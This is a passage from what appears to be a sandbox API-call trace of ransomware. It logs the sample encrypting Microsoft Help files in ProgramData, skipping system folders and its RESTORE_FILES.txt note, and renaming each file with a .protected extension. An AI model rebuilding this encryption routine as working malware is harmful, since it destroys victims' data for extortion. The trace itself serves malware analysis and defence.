(lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 58 [0072.664] StrStrW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.666] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 58 [0072.666] StrStrW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.667] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 58 [0072.668] StrStrW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.673] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.876] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.876] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.876] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.876] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.876] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.876] CloseHandle (hObject=0xa4) returned 1 [0072.877] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft 
Help\\MS.VISIO_PRM.14.1033.hxn.protected") returned 68 [0072.877] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn.protected")) returned 1 [0072.877] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.877] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="Windows") returned -1 [0072.877] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="Program Files") returned -1 [0072.877] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.877] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.877] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.877] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 58 [0072.877] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.877] lstrcmpW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.877] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.877] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.877] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.878] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 58 [0072.878] StrStrW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.878] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 58 [0072.878] StrStrW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.878] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 58 [0072.878] StrStrW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.878] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.879] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.879] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.879] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.879] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.879] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.879] CloseHandle (hObject=0xa4) returned 1 [0072.879] wnsprintfW (in: 
pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.protected") returned 68 [0072.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn.protected")) returned 1 [0072.880] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.880] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="Windows") returned -1 [0072.880] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="Program Files") returned -1 [0072.880] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.880] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.880] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.880] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 56 [0072.880] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.880] lstrcmpW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.880] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.880] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.880] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.880] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 56 [0072.880] StrStrW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.880] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 56 [0072.880] StrStrW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.880] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 56 [0072.880] StrStrW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.881] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.881] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.881] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.882] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.882] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.882] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.882] CloseHandle 
(hObject=0xa4) returned 1 [0072.882] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.protected") returned 66 [0072.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn.protected")) returned 1 [0072.883] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.883] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.883] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.883] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.883] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.883] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.883] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 60 [0072.883] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.883] lstrcmpW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.883] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.883] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.883] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" 
(normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 60 [0072.884] StrStrW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 60 [0072.884] StrStrW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 60 [0072.884] StrStrW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.884] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.884] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.885] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.885] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.885] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.885] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.885] CloseHandle (hObject=0xa4) returned 1 [0072.885] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.protected") returned 70 [0072.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn.protected")) returned 1 [0072.886] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.886] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="Windows") returned -1 [0072.886] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="Program Files") returned -1 [0072.886] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.886] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.886] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.886] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 56 [0072.886] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.886] lstrcmpW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.886] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.886] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.886] 
CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.887] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 56 [0072.887] StrStrW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.887] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 56 [0072.887] StrStrW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.887] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 56 [0072.887] StrStrW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.887] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.888] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.888] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.888] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.888] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.888] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.888] CloseHandle (hObject=0xa4) returned 1 [0072.889] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.protected") returned 66 [0072.889] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn.protected")) returned 1 [0072.889] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.889] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.889] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.889] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.889] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.889] lstrcmpiW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.889] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 60 [0072.889] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.889] lstrcmpW (lpString1="MS.WINWORD.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.889] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.889] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.889] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.890] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 60 [0072.890] StrStrW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.890] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 60 [0072.890] StrStrW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.890] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 60 [0072.890] StrStrW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.890] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.891] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.891] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.893] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.893] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 
[0072.893] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.893] CloseHandle (hObject=0xa4) returned 1 [0072.893] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.protected") returned 70 [0072.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn.protected")) returned 1 [0072.894] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.894] lstrcmpiW (lpString1="nslist.hxl", lpString2="Windows") returned -1 [0072.894] lstrcmpiW (lpString1="nslist.hxl", lpString2="Program Files") returned -1 [0072.894] lstrcmpiW (lpString1="nslist.hxl", lpString2="Program Files (x86)") returned -1 [0072.894] lstrcmpiW (lpString1="nslist.hxl", lpString2="$Recycle.bin") returned 1 [0072.894] lstrcmpiW (lpString1="nslist.hxl", lpString2="System Volume Information") returned -1 [0072.894] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl") returned 44 [0072.894] StrStrIW (lpFirst="nslist.hxl", lpSrch=".protected") returned 0x0 [0072.894] lstrcmpW (lpString1="nslist.hxl", lpString2="RESTORE_FILES.txt") returned -1 [0072.894] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.894] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
